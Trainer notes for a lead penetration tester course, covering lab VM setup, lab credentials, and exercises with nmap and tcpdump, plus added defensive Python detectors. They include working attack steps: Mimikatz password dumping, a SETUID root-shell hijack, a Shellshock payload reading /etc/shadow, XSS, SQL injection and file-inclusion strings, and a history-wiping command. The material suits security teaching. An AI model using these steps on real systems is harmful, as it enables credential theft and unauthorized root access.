
Certified Lead Penetration Tester training

Trainer Notes

www.pecb.com
Contents

Symbols used across the document, p. 3

Running the Labs (Virtual Machines), p. 4
  Where to Download, p. 4
  Software needed to run the VMs, p. 5
  Network Configuration on VMs, p. 5
  LABs Configuration & Setup, p. 6
  Configuration (a) – Students Environment, p. 6
  Configuration (b) – Trainer non-isolated environment, p. 7
  Configuration (c) – Trainer isolated environment, p. 7
  Further Notes, p. 7
  Labs – Virtual Machines, p. 10
  Windows VMs, p. 10
  Unquoted Service Path Exploit (optional LAB), p. 12
  Pass the Hash Further information (optional reading & exploit modules), p. 12
  Linux Lab & VM, p. 13
  SETUID exploit ‘bedrock’, p. 13
  SHELLSHOCK exploit, p. 14
  Brute force attack, p. 14
  Vulnerable Web Apps VM, p. 14
  Web App Solutions from the presentations, p. 17
  Kali Linux – Virtual Machine ready for Pen Testing, p. 17
  How to enable SSH on Kali Linux (for students to access remotely), p. 18
  Additional Steps (optional), p. 18
  4) MOTD – Message of the Day banner (optional), p. 19
  How to create a new normal user with sudo permission in Kali Linux, p. 20

Exercises & Tools, p. 21
  DNS, p. 21
  Nmap, p. 21
  Nmap Scripting for DNS, p. 22
  Activity Port Scanning / Network capturing, p. 23
  Basic Network mapping using NMAP, p. 23
  Basic Windows Port Scanning / Windows Service mapping, p. 24
  Basic Nmap scanning against <host>, p. 24
  Network capturing / TCPDump or Wireshark, p. 24
  Basic Nmap / SMB NSE Scripts, p. 26
  Enumeration of Users, p. 26
  Enumeration of Shares, p. 26
  Brute forcing accounts, p. 26
  Basic Vulnerability checking, p. 26
  Sessions Enumerations, p. 27
  Enumeration of Users, p. 27

Advanced Enumerations, p. 28
  LDAP Enumeration using NMAP Scripts, p. 28
  LDAP Brute Force (only for reference), p. 28
  TRAINER CHECKS, p. 30
  Note for trainers, p. 37

Symbols used across the document:

Tools

Code

CMD

URL/Website

Task/Exercise/Activity

VM – {name}

Running the Labs (Virtual Machines)
The labs are designed to be downloaded from online resources in the Internet and to
run offline in a classroom with at least a router/switch or Wi-Fi device with DHCP
enabled.

(Online Download / Offline Running)

Where to Download
a) Course Materials (including software to run the Virtual Machines)

URL/Website https://mega.co.nz/#F!NwcQVYYB
(Decryption Key = “uVSuAlkt8T4mKYpHvwLu5Q” without the quotes)

Sync URL https://link.getsync.com/#f=Course-Material&sz=1E9&t=2&s=C2ZTCQQ2W547VERKZE2UAXE4FSJCVLV6PIR76K7JLGKE45GNYWHA&i=CUOVIUR3MY6COOSTNL47GSTMMGEQRJ7CQ&v=2.0

b) LABS (All Virtual Machines to run the LABS)

URL/Website https://mega.co.nz/#F!ZksExZBC
(Decryption Key = “vuLLCcZUu4KZbY6zvTI_mg” without the quotes)

Sync URL https://link.getsync.com/#f=LABS&sz=0&t=2&s=MK26ICHL7WA7I3PGULOKBFCKVSQ774NPIFHUN55MUUR5H7NUM3UQ&i=CMIXP3HKFAVTEQUMOYBWC7UKQL4CKPCQC&v=2.0

Figure 1 - Virtual Machines

Software needed to run the VMs

All the tools below can be found in the Toolz folder within the Course Material
links.

VMware Player (free)
https://my.vmware.com/web/vmware/free#desktop_end_user_computing/vmware_player/7_0

VMware Fusion (evaluation)
http://www.vmware.com/products/fusion/fusion-evaluation

VirtualBox (free and recommended)
https://www.virtualbox.org

Network Configuration on VMs

Please make sure you understand the difference between Host-only, NAT and Bridged
networks, so that connectivity between the VMs and the students’ laptops runs
smoothly during the exercises.

For example, after importing the VMs into VirtualBox, check that the adapters are
using your current NAT Network configuration or DHCP.

You may have to add a NAT Network configuration (including the IP range).

Figure 2 - NAT Configuration on Virtual Box

LABs Configuration & Setup

Figure 3 - Isolated Lab Configuration

We propose three different environments to suit most classroom configurations
without compromising security.

The following configurations can also be combined to provide the most convenient,
yet efficient, lab.

Configuration (a) – Students Environment.

Each student has his or her own copy of the lab. VMs are large files, so we
recommend distributing them using high-speed/high-capacity external devices (USB3)
or P2P tools such as BTSync.

In this scenario each student manages their own NAT/network using either VirtualBox
or VMware and configures their services accordingly.

If the time needed to distribute the Virtual Machines allows, we recommend this
configuration.

(Normally the LABs will be used on the second day of the course)

Configuration (b) – Trainer non-isolated environment.

In this scenario all VMs use a Bridged network configuration in which the IPs are
obtained via a DHCP router/Wi-Fi and are reachable by the students through the same
network segment.

This configuration is easier to set up for the initial ‘discovery modules’ but harder
to maintain the further the students advance during the hacking activities,
particularly when assessing the Linux environment, as they may start modifying (or
even rebooting) the system several times.

Configuration (c) – Trainer isolated environment.

To keep the environment isolated when running the VMs, please follow the diagram
shown above (Figure 1).

This configuration allows the students to use the Kali Linux Virtual Machine as a
‘trampoline’ to assess the rest of the environment.

We recommend, though, using a Bridged network when working with the Web App
Virtual Machine so students can use their own laptops with graphical interfaces to
run the assessments.

Further Notes:
We believe the instructor will be familiar with the use of Virtual Machines, Routers,
Wi-Fi Configurations and IP addresses on multiple OS.

The larger VMs are the Windows Labs, which could be run within the Trainer’s laptop
at all times as most exercises revolve around network discoveries.

The configurations explained before are merely examples and a combination of them
could be used, including using students’ own material and laptops as to run the
exercises and labs more efficiently.

Please review the DNS configurations on the Windows Boxes (Windows 7 and
Windows 8.1) as to make sure they can access the Domain Controller on Windows
2008 R2 Server.

The following screenshots show how to verify the connectivity with the Domain
Controller and Active Directory server.

Figure 4 - Domain Controller IP Address

Figure 5 - Windows 8.1 DNS configuration

Figure 6 - Checking that the Domain User names are valid

Labs – Virtual Machines

Figure 7 - Virtual Machines

Windows VMs
PECB-win7.sys.lab / Windows 7 Pro – Admin/P@ssw0rd!!
PECB-DC.sys.lab / Windows Server 2008 – Administrator/P@ssw0rd!!
PECB-Win8.sys.lab / Windows 8.1 – Admin/P@ssw0rd!!

(Check the keyboard configuration if you are having trouble entering the passwords)

syslab\john.smith - Qazwsx12+1 – Normal user
syslab\jack.russell - Qazwsx12+1 – Domain Admin user

The Windows boxes should have a folder with Mimikatz and other tools in it.

Figure 8 -Toolz Folder on user Admin

To allow Mimikatz to pull a user’s password from memory, make sure you access
some Windows (shared) resources before using it.
For example: open \\pecb-dc in Windows Explorer and log in as syslab\jack.russell.

After launching Mimikatz use the following commands:

privilege::debug
sekurlsa::logonpasswords

The debug privilege allows someone to debug a process that they wouldn’t otherwise
have access to. For example, a process running as a user with the debug privilege
enabled on its token can debug a service running as Local System.
More from: http://msdn.microsoft.com/library/windows/hardware/ff541528.aspx

mimikatz # privilege::debug
Privilege '20' OK

Remark: the error
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061
means that the required privilege is not held by the client (mostly you're not an
administrator).

Unquoted Service Path Exploit (optional LAB)

To exploit the unquoted service path vulnerability, the following Metasploit module
can be used:
exploit/windows/local/trusted_service_path
The module requires an open session and, once launched, will look through the
system for services that are set to auto-start and have been configured without
quotes in the path of their executable.
How to configure one: to introduce this vulnerability into a system, use regedit to
edit the path of the service executable; only the quotes around the path need to
be removed.
Example:
If the path to the service is C:\Program Files\hello.exe, an attacker with write
access to C:\ would be able to place a malicious program in the root of C: with the
name hello.exe, which would get executed the next time that service is restarted.
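As an added example (not part of the trainer notes or the Metasploit module), the Python below audits ImagePath values the way a reviewer would check a host: it flags unquoted paths containing spaces, lists the truncated candidates CreateProcess tries before the real executable (C:\Program.exe for the page's C:\Program Files\hello.exe), and produces the quoted value that fixes the entry. Service names and paths are constructed.

```python
import re

# Constructed sample of ImagePath values as they appear under
# HKLM\SYSTEM\CurrentControlSet\Services\<name>\ImagePath (illustrative,
# not copied from the lab VMs). HelloSvc mirrors the page's example.
SAMPLE_SERVICES = {
    "HelloSvc": r"C:\Program Files\hello.exe",
    "VendorSvc": r"C:\Program Files (x86)\Some Vendor\Sub Dir\agent.exe -service",
    "QuotedSvc": r'"C:\Program Files\Vendor App\svc.exe" -run',
    "SvcHost": r"C:\Windows\system32\svchost.exe -k netsvcs",
    "NoSpaces": r"C:\Tools\agent.exe --daemon",
}

_EXE_RE = re.compile(r"\.exe", re.IGNORECASE)


def split_image_path(image_path):
    """Return (executable, arguments) for an ImagePath string.

    A quoted path ends at the closing quote; an unquoted one is taken up to the
    first '.exe', which is how service executables are normally written.
    """
    p = image_path.strip()
    if p.startswith('"'):
        end = p.find('"', 1)
        if end == -1:
            return p[1:], ""
        return p[1:end], p[end + 1:].strip()
    m = _EXE_RE.search(p)
    if m:
        return p[:m.end()], p[m.end():].strip()
    first, _, rest = p.partition(" ")
    return first, rest


def is_unquoted_with_spaces(image_path):
    """True when the executable path is unquoted and contains a space."""
    if image_path.strip().startswith('"'):
        return False
    exe, _ = split_image_path(image_path)
    return " " in exe


def lookup_candidates(image_path):
    """Paths CreateProcess tries, in order, for an unquoted path with spaces.

    It truncates at every space and appends .exe, so the page's example
    'C:\\Program Files\\hello.exe' yields ['C:\\Program.exe',
    'C:\\Program Files\\hello.exe']; the first file that exists is executed.
    """
    exe, _ = split_image_path(image_path)
    candidates = []
    idx = exe.find(" ")
    while idx != -1:
        candidates.append(exe[:idx] + ".exe")
        idx = exe.find(" ", idx + 1)
    candidates.append(exe)
    return candidates


def quote_image_path(image_path):
    """Remediated value: the executable wrapped in quotes, arguments kept."""
    exe, args = split_image_path(image_path)
    return f'"{exe}"' + (f" {args}" if args else "")


def audit(services):
    """Map each vulnerable service name to the spurious paths tried before its own."""
    findings = {}
    for name, path in services.items():
        if is_unquoted_with_spaces(path):
            findings[name] = lookup_candidates(path)[:-1]
    return findings


if __name__ == "__main__":
    for name, spurious in audit(SAMPLE_SERVICES).items():
        print(f"{name}: unquoted ImagePath; a file at any of these runs instead:")
        for candidate in spurious:
            print(f"    {candidate}")
        print(f"    fix: ImagePath = {quote_image_path(SAMPLE_SERVICES[name])}")
```

On a live host the same checks apply to the output of `sc qc <service>` or `wmic service get name,pathname`; only directories an unprivileged user can write to turn a finding into an actual weakness.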

Pass the Hash Further information (optional reading & exploit modules)
https://www.kali.org/penetration-testing/passing-hash-remote-desktop/
https://github.com/gentilkiwi/mimikatz/wiki/module-%7E-sekurlsa#pth
https://www.youtube.com/watch?feature=player_embedded&v=x-bIZRU-eLM
http://tools.kali.org/password-attacks/keimpx
https://www.nsa.gov/ia/_files/app/Reducing_the_Effectiveness_of_Pass-the-Hash.pdf

Linux Lab & VM
msfadmin/password are the credentials to login.
Root password is ‘Qazwsx12+1!’
Webserver for exploiting the Shellshock vulnerability is set to start automatically.
Vulnerable SETUID root file (bedrock) sits in msfadmin home directory

SETUID exploit ‘bedrock’

A vulnerable SETUID root application lives in the msfadmin user's home directory
with the name ‘bedrock’. On execution it calls the system binary ‘ls’ without an
explicit PATH and can therefore be exploited to run arbitrary code.
To exploit this vulnerability the following steps would need to be performed:
A rogue ‘ls’ script with the following contents would need to be created:

msfadmin@linuxbox:~$ nano ls

/bin/cp /bin/sh /tmp/sh
/bin/chown root /tmp/sh
/bin/chmod 6555 /tmp/sh

(save with Ctrl+O, Enter and leave nano with Ctrl+X)

msfadmin@linuxbox:~$ chmod 755 ls
Next the PATH variable would need to be changed:
msfadmin@linuxbox:~$ export PATH="."
Running the ‘bedrock’ executable now would create a SETUID root shell in /tmp
msfadmin@linuxbox:~$ ./bedrock
To test if we can execute commands as root try the following
msfadmin@linuxbox:~$ /sbin/poweroff
poweroff: Need to be root

Now execute the SUID shell and run the poweroff command again ;)
msfadmin@linuxbox:~$ /tmp/sh
# /sbin/poweroff

Additional Notes SETUID

a) Find SGID or SUID files using the following:
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null
b) Look at the binary to see if you can figure out what it does:
c) run strings on the binary
d) run strace (specifically strace -qf -e execve ./bedrock) to see what other
programs it calls
e) look at the permissions of other programs
f) if system binaries are called, look at how they are called and whether you can
change the PATH variable to exploit them
g) change PATH to "." and drop in a custom "ls" file containing the following
/bin/cp /bin/sh /tmp/sh
/bin/chown root /tmp/sh
/bin/chmod 6555 /tmp/sh

The SUID root shell needs to be called 'sh' or run with the '-p' parameter to get
past bash protection (bash drops root privileges when run with SUID).

SHELLSHOCK exploit:
wget -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /etc/shadow" http://127.0.0.1/cgi-bin/test.cgi

The Apache user www-data was added to the shadow group to be able to read the shadow file.
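From the defender's side, the request above is easy to spot because CGI copies the User-Agent (and Referer) header straight into bash's environment, so the function-definition prefix `() {` has to appear in the header value. As an added example (not part of the trainer notes), the Python below parses constructed Apache combined-format log lines, including the `\"` escapes the page's payload produces, and reports the lines carrying that prefix; a second function applies the same check to inbound headers before they reach a CGI script.

```python
import re

# The prefix a Shellshock-vulnerable bash (CVE-2014-6271) parses as an exported
# function definition when it starts the value of any environment variable.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Apache "combined" log format. Double-quoted fields may contain \" escapes,
# which is exactly what the page's User-Agent payload produces.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<req>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<user_agent>(?:[^"\\]|\\.)*)"'
)

# Constructed access-log excerpt: the first line is what the page's wget command
# leaves behind, the second is ordinary browsing, the third carries the probe in
# the Referer header instead of the User-Agent.
SAMPLE_LOG = r"""
172.16.204.143 - - [30/Sep/2014:00:01:12 +0100] "GET /cgi-bin/test.cgi HTTP/1.0" 200 1207 "-" "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /etc/shadow"
172.16.204.10 - - [30/Sep/2014:00:01:15 +0100] "GET /WackoPicko/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/32.0"
172.16.204.143 - - [30/Sep/2014:00:01:20 +0100] "GET /cgi-bin/test.cgi HTTP/1.1" 200 12 "() { :; }; /usr/bin/id" "curl/7.38.0"
""".strip()

# CGI exports these request headers into the script's environment (HTTP_USER_AGENT,
# HTTP_REFERER), so they are the fields through which a request can reach bash.
CGI_HEADER_FIELDS = ("user_agent", "referer")


def parse_combined(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def shellshock_hits(log_text):
    """Return (client_ip, field, request) for every line whose header carries the prefix."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_combined(line)
        if rec is None:
            continue
        for field in CGI_HEADER_FIELDS:
            if SHELLSHOCK_RE.search(rec[field]):
                hits.append((rec["ip"], field, rec["req"]))
    return hits


def reject_request(headers):
    """Guard for a CGI front end: True if any header value would reach bash's
    environment carrying the function-definition prefix."""
    return any(SHELLSHOCK_RE.search(value) for value in headers.values())


if __name__ == "__main__":
    for ip, field, req in shellshock_hits(SAMPLE_LOG):
        print(f"Shellshock probe from {ip} via {field}: {req}")
```

The header guard only buys time; the fix for the lab box is the patched bash, which no longer imports function definitions from arbitrary environment variables.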

Brute force attack:


SSH is open and the account called msfadmin has a password set as 'password'

Vulnerable Web Apps VM

The particular Web App chosen for this course can be accessed at /WackoPicko/
(see the screenshots below).

To access the VM, the credentials are root/owaspbwa

More information on the VM and the other Web Apps installed on it can be found at
https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project

If you want to download a fresh/vanilla VM for these exercises please follow this link:
http://sourceforge.net/projects/owaspbwa/files/

Running the VM (IP addresses may differ depending on installation/configuration)

Figure 9 - OWASP Vulnerable Web Applications

Figure 10 - Access to all Web Apps within the Virtual Machine

Figure 11 - Web Application chosen for the course

Web App Solutions from the presentations

1. Reflected XSS on homepage - The search box is vulnerable and takes a standard
XSS exploit vector, e.g.: <script>alert()</script>
2. Stored XSS - The comment parameter in the guestbook is vulnerable to stored
XSS. Standard vector, e.g.: <script>alert()</script>
3. Basic SQL injection - The username parameter of the login page is vulnerable,
e.g.: ' OR 1=1#
4. Local File Access - The page param of the admin URL is vulnerable and can be
exploited by: /admin/index.php?page=/etc/passwd%00

Kali Linux – Virtual Machine ready for Pen Testing

https://www.kali.org

Default Credentials = root / toor

If you need to delete the history so other students can use the VM, please type
the following command:

cat /dev/null > ~/.bash_history && history -c && exit

How to enable SSH on Kali Linux (for students to access remotely)

Kali Linux does not come with SSH enabled. SSH is the preferred method of remote
management for most Linux-based systems and will give students a fully configured
environment to use.

root@kali:~# service --status-all

If the SSH service shows a minus sign (-) it means that it is not ‘running’.

a) Install the server from the terminal window:
root@kali:~# apt-get install openssh-server
b) Start the SSH service with the following command:
root@kali:~# service ssh start

Additional Steps (optional)

2) Configure SSH to run persistently, in other words to survive a reboot.
a) First we need to remove the run levels for SSH by issuing the command:
root@kali:~# update-rc.d -f ssh remove

b) Now we need to load the default SSH run levels by issuing the following command:
root@kali:~# update-rc.d -f ssh defaults

3) Change the default SSH keys

We now need to change the default SSH keys. The reason for this is that every
Linux and Unix system uses similar keys. An attacker could potentially guess or
crack your SSH keys and exploit your system using Man-in-the-Middle techniques.
a) Back up and move the default Kali Linux keys
root@kali:~# cd /etc/ssh/
root@kali:/etc/ssh# mkdir insecure_original_default_kali_keys
root@kali:/etc/ssh# mv ssh_host_* insecure_original_default_kali_keys/

b) Create new keys

Type the following command in the terminal window:
root@kali:/etc/ssh# dpkg-reconfigure openssh-server
Creating SSH2 RSA key; this may take some time ...
Creating SSH2 DSA key; this may take some time ...
Creating SSH2 ECDSA key; this may take some time ...
[ ok ] Restarting OpenBSD Secure Shell server: sshd.
root@kali:/etc/ssh#

4) MOTD – Message of the Day banner (optional)

You can create a login banner, also known as a Message of the Day (MOTD) banner,
on Kali Linux that is displayed when users log in.
Just edit the /etc/motd file (restart SSH after you have completed the edit).
Edit the following file and add your text.
root@kali:~# vi /etc/motd
root@kali:~# service ssh restart

Example banner (the PECB ASCII-art logo that precedes the text is omitted here):

-----------------------------------------------------------------
Warning: This system is restricted to private use by
authorized users for business purposes only. Unauthorized access
or use is a violation of company policy and the law. This system
may be monitored for administrative and security reasons. By
proceeding, you acknowledge that (1) you have read and understand
this notice and (2) you consent to the system monitoring.
-----------------------------------------------------------------

How to create a new normal user with sudo permission in Kali Linux
Open a terminal and issue the following command.
root@kali:~# useradd -m <username>

-m creates a home directory for the user.

Now we have to set a password for the user.
root@kali:~# passwd <username>

It will ask you to create a new password.

At this point we have a new user account, but we might want to add our new user to
the "sudo" group so that we can use "sudo" to perform administrative actions.
root@kali:~# usermod -a -G sudo <username>

The option -a means append and '-G sudo' means add the user to the sudo group.
If you want to know more about the usermod command, issue man usermod.
Now we have to specify the shell for our new user.
root@kali:~# chsh -s /bin/bash <username>

The chsh command is used to change the login shell for a user.

Exercises & Tools

DNS
Slide: Domain Name System (DNS) – Basics

Understanding/knowing the types of Authoritative Name Servers:

Master server (primary name server)
Slave server (secondary name server)

$ host -t ns pecb.org
pecb.org name server ns3.dreamhost.com.
pecb.org name server ns1.dreamhost.com.
pecb.org name server ns2.dreamhost.com.

Nmap:

http://nmap.org/download.html (Folder Toolz)
Nmap Scripting for DNS:
(Slide: Operation of DNS – Pen Testing view)

dns-blacklist
Checks target IP addresses against multiple DNS anti-spam and open proxy
blacklists and returns a list of services for which an IP has been flagged. Checks may
be limited by service category (eg: SPAM, PROXY) or to a specific service name.

dns-brute
Attempts to enumerate DNS hostnames by brute force guessing of common
subdomains. With the dns-brute.srv argument, dns-brute will also try to enumerate
common DNS SRV records.

dns-cache-snoop
Performs DNS cache snooping against a DNS server.

dns-check-zone
Checks DNS zone configuration against best practices, including RFC 1912. The
configuration checks are divided into categories which each have a number of
different tests.

dns-client-subnet-scan
Performs a domain lookup using the edns-client-subnet option which allows clients to
specify the subnet that queries supposedly originate from. The script uses this option
to supply a number of geographically distributed locations in an attempt to enumerate
as many different address records as possible. The script also supports requests
using a given subnet.

dns-fuzz
Launches a DNS fuzzing attack against DNS servers.

dns-ip6-arpa-scan
Performs a quick reverse DNS lookup of an IPv6 network using a technique which
analyzes DNS server response codes to dramatically reduce the number of queries
needed to enumerate large networks.

dns-nsec-enum
Enumerates DNS names using the DNSSEC NSEC-walking technique.

dns-nsec3-enum
Tries to enumerate domain names from the DNS server that supports DNSSEC
NSEC3 records.

dns-nsid
Retrieves information from a DNS nameserver by requesting its nameserver ID (nsid)
and asking for its id.server and version.bind values. This script performs the same
queries as the following two dig commands:
- dig CH TXT bind.version @target
- dig +nsid CH TXT id.server @target
dns-random-srcport
Checks a DNS server for the predictable-port recursion vulnerability. Predictable
source ports can make a DNS server vulnerable to cache poisoning attacks (see
CVE-2008-1447).

dns-random-txid
Checks a DNS server for the predictable-TXID DNS recursion vulnerability.
Predictable TXID values can make a DNS server vulnerable to cache poisoning
attacks (see CVE-2008-1447).

dns-recursion
Checks if a DNS server allows queries for third-party names. It is expected that
recursion will be enabled on your own internal nameservers.

dns-service-discovery
Attempts to discover target hosts' services using the DNS Service Discovery
protocol.

dns-srv-enum
Enumerates various common service (SRV) records for a given domain name. The
service records contain the hostname, port and priority of servers for a given service.
The following services are enumerated by the script:
- Active Directory Global Catalog
- Exchange Autodiscovery
- Kerberos KDC Service
- Kerberos Passwd Change Service
- LDAP Servers
- SIP Servers
- XMPP S2S
- XMPP C2S

dns-update
Attempts to perform a dynamic DNS update without authentication.

dns-zeustracker
Checks if the target IP range is part of a Zeus botnet by querying ZTDNS @
abuse.ch. Please review the following information before you start to scan:

https://zeustracker.abuse.ch/ztdns.php

dns-zone-transfer
Requests a zone transfer (AXFR) from a DNS server.

Activity Port Scanning / Network capturing

Basic Network mapping using NMAP

- NMAP pings and SYN scanning
- Network capturing / TCPDump or Wireshark
- DNS enumeration using NMAP

Basic Windows Port Scanning / Windows Service mapping
Basic port mapping against a full Active Directory (Domain Controller) Windows
Server & Windows 8 host

Basic Nmap scanning against <host>

nmap -sP <local.ip.range>     (e.g. nmap -sP 172.16.204.*)
nmap -sS <host> -vv
nmap -sV <host> -vv
nmap -A <host> -vv

Network capturing / TCPDump or Wireshark

Capture TCP/SYN packets

TCPDump
http://www.tcpdump.org

Let's detect a SYN scan:

tcpdump -nnvv -i eth0 'tcp[tcpflags] & (tcp-syn) != 0 and not port 22 and host 172.16.204.143'

(tcp[tcpflags] is byte 13 of the TCP header; this filter also shows the SYN/ACK
replies, so to see only the probes use 'tcp[tcpflags] & (tcp-syn|tcp-ack) == tcp-syn'.)
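The filter above shows the packets, but a scan is recognised by one source sending bare SYNs to many ports. As an added example (not part of the trainer notes), the Python below parses constructed `tcpdump -nn` output lines, rebuilds the tcp[tcpflags] byte from the Flags [...] text, applies the same SYN-only and not-port-22 logic as the filter, and reports sources that probed at least a threshold of distinct ports. Addresses and lines are constructed; the assumed input format is tcpdump's default TCP line.

```python
import re
from collections import defaultdict

# TCP flag bits as the filter uses them: tcp-syn == 0x02 and tcp-ack == 0x10
# in byte 13 of the TCP header, i.e. tcp[tcpflags].
TCP_SYN = 0x02
TCP_ACK = 0x10

# One line of `tcpdump -nn` output for a TCP segment, e.g.
# 00:01:02.000001 IP 172.16.204.143.40001 > 172.16.204.10.445: Flags [S], seq 1, win 1024, length 0
TCP_LINE_RE = re.compile(
    r"^(?P<ts>\d{2}:\d{2}:\d{2}\.\d+) IP (?P<src>\d+(?:\.\d+){3})\.(?P<sport>\d+) > "
    r"(?P<dst>\d+(?:\.\d+){3})\.(?P<dport>\d+): Flags \[(?P<flags>[^\]]*)\]"
)

# Constructed capture: 172.16.204.143 probes seven ports with bare SYNs (one of
# them SSH, which the page's filter excludes); 172.16.204.10 completes a normal
# handshake with a file server on port 445.
SAMPLE_CAPTURE = """
00:01:02.000001 IP 172.16.204.143.40001 > 172.16.204.10.21: Flags [S], seq 1, win 1024, length 0
00:01:02.000002 IP 172.16.204.143.40002 > 172.16.204.10.22: Flags [S], seq 1, win 1024, length 0
00:01:02.000003 IP 172.16.204.143.40003 > 172.16.204.10.25: Flags [S], seq 1, win 1024, length 0
00:01:02.000004 IP 172.16.204.143.40004 > 172.16.204.10.80: Flags [S], seq 1, win 1024, length 0
00:01:02.000005 IP 172.16.204.143.40005 > 172.16.204.10.139: Flags [S], seq 1, win 1024, length 0
00:01:02.000006 IP 172.16.204.143.40006 > 172.16.204.10.445: Flags [S], seq 1, win 1024, length 0
00:01:02.000007 IP 172.16.204.143.40007 > 172.16.204.10.3389: Flags [S], seq 1, win 1024, length 0
00:01:02.000008 IP 172.16.204.10.445 > 172.16.204.143.40006: Flags [R.], seq 0, ack 2, win 0, length 0
00:01:03.000001 IP 172.16.204.10.51000 > 172.16.204.5.445: Flags [S], seq 100, win 29200, length 0
00:01:03.000002 IP 172.16.204.5.445 > 172.16.204.10.51000: Flags [S.], seq 200, ack 101, win 8192, length 0
00:01:03.000003 IP 172.16.204.10.51000 > 172.16.204.5.445: Flags [.], ack 1, win 229, length 0
""".strip()


def flags_byte(flag_text):
    """Translate tcpdump's Flags [...] text (S, ., R, F, P, U) into the tcp[tcpflags] byte."""
    bits = {"F": 0x01, "S": TCP_SYN, "R": 0x04, "P": 0x08, ".": TCP_ACK, "U": 0x20}
    value = 0
    for ch in flag_text:
        value |= bits.get(ch, 0)
    return value


def is_bare_syn(flags):
    """Mirror of the filter 'tcp[tcpflags] & (tcp-syn|tcp-ack) == tcp-syn'."""
    return flags & (TCP_SYN | TCP_ACK) == TCP_SYN


def parse_tcp_line(line):
    """Parse one tcpdump TCP line into a dict with integer ports and a flags byte."""
    m = TCP_LINE_RE.match(line)
    if not m:
        return None
    pkt = m.groupdict()
    pkt["sport"], pkt["dport"] = int(pkt["sport"]), int(pkt["dport"])
    pkt["flags"] = flags_byte(pkt["flags"])
    return pkt


def syn_scan_sources(capture_text, threshold=5, ignore_ports=(22,)):
    """Return {src: sorted probed ports} for sources that sent bare SYNs to at
    least `threshold` distinct ports; ports in ignore_ports are not counted,
    matching the 'not port 22' clause of the page's filter."""
    probed = defaultdict(set)
    for line in capture_text.splitlines():
        pkt = parse_tcp_line(line)
        if pkt is None or not is_bare_syn(pkt["flags"]) or pkt["dport"] in ignore_ports:
            continue
        probed[pkt["src"]].add(pkt["dport"])
    return {src: sorted(ports) for src, ports in probed.items() if len(ports) >= threshold}


if __name__ == "__main__":
    for src, ports in syn_scan_sources(SAMPLE_CAPTURE).items():
        print(f"possible SYN scan from {src}: {len(ports)} ports {ports}")
```

Feeding real output works as `tcpdump -nn -i eth0 tcp | python3 this_script.py` once the capture text is read from stdin instead of SAMPLE_CAPTURE; raise the threshold on busy segments to avoid flagging normal clients.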

How to view traffic with tcpdump (filter syntax, followed by an example):

specific host: tcpdump 'host <ipaddress>'
    e.g. tcpdump 'host 10.10.10.1'
specific source host: tcpdump 'src host <ipaddress>'
    e.g. tcpdump 'src host 10.10.10.1'
specific destination host: tcpdump 'dst host <ipaddress>'
    e.g. tcpdump 'dst host 10.10.10.1'
specific network: tcpdump 'net <network address>'
    e.g. tcpdump 'net 10.10.10.0'
specific source network: tcpdump 'src net <network address>'
    e.g. tcpdump 'src net 10.10.10.0'
specific destination network: tcpdump 'dst net <network address>'
    e.g. tcpdump 'dst net 10.10.10.0'
specific port: tcpdump 'port <port-number>'
    e.g. tcpdump 'port 21'
specific source port: tcpdump 'src port <port-number>'
    e.g. tcpdump 'src port 21'
specific destination port: tcpdump 'dst port <port-number>'
    e.g. tcpdump 'dst port 21'
specific host and a particular port: tcpdump 'host <ipaddress> and port <port-number>'
    e.g. tcpdump 'host 10.10.10.1 and port 21'
specific host, all ports except SSH: tcpdump 'host <ipaddress> and port not <port-number>'
    e.g. tcpdump 'host 10.10.10.1 and port not 22'
specific protocol: tcpdump 'proto icmp'
    tcpdump 'proto udp'
    tcpdump 'proto tcp'
    tcpdump 'arp'
particular interface: tcpdump -i <interface>
    e.g. tcpdump -i eth1
specific port on a particular interface: tcpdump -i <interface> 'port <port-number>'
    e.g. tcpdump -i eth1 'port 21'

Wireshark
https://www.wireshark.org

Duration of activity: 20 minutes

nmap -sSU -p 53 --script dns-nsid <target>

Retrieves information from a DNS nameserver by requesting its nameserver ID (nsid)
and asking for its id.server and version.bind values.

This script performs the same queries as the following two dig commands:
- dig CH TXT bind.version @target
- dig +nsid CH TXT id.server @target

Example

$ sudo nmap -sSU -p 53 --script dns-nsid 192.168.1.1

Starting Nmap 6.47 ( http://nmap.org ) at 2014-09-30 00:01 BST
Nmap scan report for 192.168.1.1
Host is up (0.0059s latency).
PORT STATE SERVICE
53/tcp open domain
53/udp open domain
| dns-nsid:
|_ bind.version: dnsmasq-2.68
MAC Address: 00:04:A7:0C:22:D3 (FabiaTech)
Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds

$ nmap --script dns-brute www.pecb.org

Attempts to enumerate DNS hostnames by brute force guessing of common subdomains.

Host script results:
| dns-brute:
| DNS Brute-force hostnames:
| mysql.pecb.org - 67.205.8.96
| www.pecb.org - 67.205.10.57
| mail.pecb.org - 208.97.132.208
| ftp.pecb.org - 67.205.10.57
|_ ssh.pecb.org - 67.205.10.57

Activity Port Scanning / Windows Service mapping and basic enumeration techniques
Basic port mapping against a full Active Directory (Domain Controller) Windows
Server & Windows 8 host

Basic Nmap / SMB NSE Scripts

Enumeration of Users
nmap --script smb-enum-users.nse -p445 <host>
sudo nmap -sU -sS --script smb-enum-users.nse -p U:137,T:139 <host>
root@kali:/# enum4linux -U -o -u "user" -p "password" <host>

Enumeration of Shares
nmap --script smb-enum-shares.nse -p445 <host>
sudo nmap -sU -sS --script smb-enum-shares.nse -p U:137,T:139 <host>
root@kali:/# enum4linux -S -o <host>

Brute forcing accounts
nmap --script smb-brute.nse -p445 <host>
sudo nmap -sU -sS --script smb-brute.nse -p U:137,T:139 <host>

Basic Vulnerability checking
nmap --script smb-check-vulns.nse -p445 <host>
sudo nmap -sU -sS --script smb-check-vulns.nse -p U:137,T:139 <host>

Sessions Enumerations
nmap --script smb-enum-sessions.nse -p445 <host>
